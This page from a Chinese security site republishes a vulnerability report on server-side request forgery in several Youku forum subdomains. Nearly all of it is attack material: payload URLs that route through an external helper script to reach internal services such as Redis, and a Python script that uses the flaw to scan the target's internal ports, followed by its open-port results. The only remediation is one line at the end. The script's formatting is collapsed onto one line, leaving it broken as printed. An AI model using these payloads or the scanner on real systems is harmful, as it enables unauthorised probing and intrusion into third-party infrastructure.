首页 > 网络安全频道 > 网站安全 > 正文
优酷多个分站存在SSRF漏洞大礼包
2016-07-12     我来说两句       作者:黑帽网
   我要投稿

RT

具体危害请看前面的例子

 

http://bbs.yj.youku.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]
http://club.youku.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6379%26data=helo.jpg[/img]
http://bbs.youkutv.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=80%26data=helo.jpg[/img]
http://bbs.share.youku.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6379%26data=helo.jpg[/img]
http://bbs.wan.youku.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=80%26data=helo.jpg[/img]

 

随便找个站扫下端口:
 

#!/usr/bin/env python# -*- coding: utf-8 -*-# @Author: Lcy# @Date:   2016-07-05 20:55:30# @Last Modified by:   Lcy# @Last Modified time: 2016-07-11 09:28:01import requestsimport threadingimport Queueimport timethreads_count = 1que = Queue.Queue()lock = threading.Lock()threads = []ports = [21,22,23,25,69,80,81,82,83,84,110,389,389,443,445,488,512,513,514,873,901,1043,1080,1099,1090,1158,1352,1433,1434,1521,2049,2100,2181,2601,2604,3128,3306,3307,3389,4440,4444,4445,4848,5000,5280,5432,5500,5632,5900,5901,5902,5903,5984,6000,6033,6082,6379,6666,7001,7001,7002,7070,7101,7676,7777,7899,7988,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8069,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8098,8099,8980,8990,8443,8686,8787,8880,8888,9000,9001,9043,9045,9060,9080,9081,9088,9088,9090,9091,9100,9200,9300,9443,9871,9999,10000,10068,10086,11211,20000,22022,22222,27017,28017,50060,50070]for i in ports:    que.put(str(i))def run():    while que.qsize() > 0:        p = que.get()        try:            url = "http://bbs.yj.youku.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip=127.0.0.1%26port={port}%26data=helo.jpg[/img]".format(                port=p)            time.sleep(0.3)            r = requests.get(url,timeout=1.8)        except:            lock.acquire()            print "{port}  Open".format(port=p)            lock.release()for i in range(threads_count):    t = threading.Thread(target=run)    threads.append(t)    t.setDaemon(True)    t.start()while que.qsize() > 0:    time.sleep(1.0)




 

80  Open9000  Open11211  Open22022  Open

 

解决方案:

禁止对内网资源访问,取外网资源的API部署在不属于自己的机房

点击收藏到自己的收藏夹!回本站首页
您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力  
上一篇:游戏安全之欢畅游戏官网SQL注入/涉及600万玩家手机邮箱帐号密码安全
下一篇:TaintDroid剖析之DVM变量级污点跟踪(下篇)
相关文章
图文推荐
排行
热门
网站
工具
无线
关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训
版权所有: 中国黑帽网--致力于做最好的网络安全技术学习网站 。